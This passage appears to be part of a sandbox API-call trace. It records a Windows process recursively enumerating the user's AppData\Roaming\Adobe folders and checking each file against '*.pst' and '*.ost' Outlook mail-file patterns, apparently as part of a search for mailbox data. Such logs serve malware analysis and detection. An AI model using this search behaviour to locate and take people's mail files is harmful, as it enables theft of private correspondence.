lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5d03770 [0249.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.250] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.250] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.250] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.250] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC", pszFile="Collab" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab" [0249.250] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*" [0249.250] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5d03bf0 [0249.251] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.251] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.251] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.251] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0249.251] FindClose (in: hFindFile=0x5d03bf0 | out: hFindFile=0x5d03bf0) returned 1 [0249.251] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.251] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.251] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC", pszFile="Forms" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms" [0249.251] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*" [0249.251] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Forms\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5d02bd0 [0249.251] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.251] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.252] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0249.252] FindClose (in: hFindFile=0x5d02bd0 | out: hFindFile=0x5d02bd0) returned 1 [0249.252] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.252] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC", pszFile="JSCache" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" [0249.252] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*" [0249.252] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5d02bd0 [0249.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.252] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.252] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.252] PathMatchSpecW (pszFile="GlobData", pszSpec="*.pst") returned 0 [0249.252] PathMatchSpecW (pszFile="GlobData", pszSpec="*.ost") returned 0 [0249.252] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.252] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.252] PathMatchSpecW (pszFile="GlobSettings", pszSpec="*.pst") returned 0 [0249.252] PathMatchSpecW (pszFile="GlobSettings", pszSpec="*.ost") returned 0 [0249.252] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0249.253] FindClose (in: hFindFile=0x5d02bd0 | out: hFindFile=0x5d02bd0) returned 1 [0249.253] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.253] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC", pszFile="Security" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security" [0249.253] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*" [0249.253] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5d02bd0 [0249.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.253] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.253] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.253] PathMatchSpecW (pszFile="addressbook.acrodata", pszSpec="*.pst") returned 0 [0249.253] PathMatchSpecW (pszFile="addressbook.acrodata", pszSpec="*.ost") returned 0 [0249.253] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.253] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.253] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security", pszFile="CRLCache" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" [0249.253] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*" [0249.253] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5d03bf0 [0249.254] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.254] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0249.254] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.254] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0249.254] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.254] PathMatchSpecW (pszFile="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", pszSpec="*.pst") returned 0 [0249.254] PathMatchSpecW (pszFile="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", pszSpec="*.ost") returned 0 [0249.254] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0249.254] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.254] PathMatchSpecW (pszFile="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", pszSpec="*.pst") returned 0 [0249.254] PathMatchSpecW (pszFile="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", pszSpec="*.ost") returned 0 [0249.254] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0 [0249.254] FindClose (in: hFindFile=0x5d03bf0 | out: hFindFile=0x5d03bf0) returned 1 [0249.254] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0249.254] FindClose (in: hFindFile=0x5d02bd0 | out: hFindFile=0x5d02bd0) returned 1 [0249.255] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0249.255] FindClose (in: hFindFile=0x5d03770 | out: hFindFile=0x5d03770) returned 1 [0249.255] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.255] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.255] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.255] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", pszFile="Flash Player" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player" [0249.255] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*" [0249.255] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d03bf0 [0249.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.255] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.255] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.255] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.255] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="AssetCache" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache" [0249.255] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*" [0249.255] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5d036b0 [0249.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.256] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.256] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.256] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache", pszFile="NAHQNPMN" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN" [0249.256] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*" [0249.256] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5d03770 [0249.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.256] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0249.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.256] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0249.256] FindClose (in: hFindFile=0x5d03770 | out: hFindFile=0x5d03770) returned 1 [0249.256] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0249.256] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.256] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.256] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.256] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player", pszFile="NativeCache" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0249.256] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*" [0249.256] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5d036b0 [0249.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.257] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.257] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.257] PathMatchSpecW (pszFile="NativeCache.directory", pszSpec="*.pst") returned 0 [0249.257] PathMatchSpecW (pszFile="NativeCache.directory", pszSpec="*.ost") returned 0 [0249.257] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0249.257] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.257] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.257] FindClose (in: hFindFile=0x5d03bf0 | out: hFindFile=0x5d03bf0) returned 1 [0249.257] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.257] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.257] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", pszFile="Headlights" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights" [0249.257] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*" [0249.257] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Headlights\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d036b0 [0249.258] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.258] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.258] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.258] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.258] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.258] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.258] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.258] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", pszFile="Linguistics" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics" [0249.258] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*" [0249.258] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Linguistics\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d02bd0 [0249.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.259] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.259] FindNextFileW (in: hFindFile=0x5d02bd0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.259] FindClose (in: hFindFile=0x5d02bd0 | out: hFindFile=0x5d02bd0) returned 1 [0249.259] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.259] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", pszFile="LogTransport2" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2" [0249.259] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0249.259] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d036b0 [0249.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.259] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.259] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.259] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2", pszFile="Logs" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" [0249.259] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*" [0249.259] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5d03770 [0249.259] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.260] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.260] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.260] FindNextFileW (in: hFindFile=0x5d03770, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0249.260] FindClose (in: hFindFile=0x5d03770 | out: hFindFile=0x5d03770) returned 1 [0249.260] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.260] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.260] PathMatchSpecW (pszFile="LogTransport2.cfg", pszSpec="*.pst") returned 0 [0249.260] PathMatchSpecW (pszFile="LogTransport2.cfg", pszSpec="*.ost") returned 0 [0249.260] FindNextFileW (in: hFindFile=0x5d036b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.260] FindClose (in: hFindFile=0x5d036b0 | out: hFindFile=0x5d036b0) returned 1 [0249.260] FindNextFileW (in: hFindFile=0x5d031d0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.260] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.260] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", pszFile="Sonar" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar" [0249.260] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*" [0249.260] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d03bf0 [0249.261] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.261] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.261] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.261] FindNextFileW (in: hFindFile=0x5d03bf0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.261] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.261] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar", pszFile="Sonar1.0" | 